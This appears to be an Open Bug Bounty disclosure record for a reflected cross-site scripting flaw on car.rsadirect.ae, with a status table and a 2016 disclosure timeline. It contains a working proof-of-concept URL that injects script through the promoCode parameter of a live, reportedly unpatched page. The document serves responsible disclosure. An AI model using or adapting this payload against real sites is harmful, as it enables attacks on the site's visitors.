
car.rsadirect.ae XSS vulnerability

Description

##### Vulnerable URL:

https://car.rsadirect.ae/QuoteAndBuy/CarStep1.do?promoCode=%3C/title%3E%3C/script/%22-alert%280%29-%22--%3E%22%3E%3Csvg/onload=prompt%28/OPENBUGBOUNTY/%29%3E

##### Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 27.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check car.rsadirect.ae SSL connection:| (Grade: C+)

##### Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 May, 2016 15:00 GMT
Generic security notifications sent to website owner| 26 May, 2016 15:02 GMT
Vulnerability details disclosed by researcher| 18 August, 2016 15:12 GMT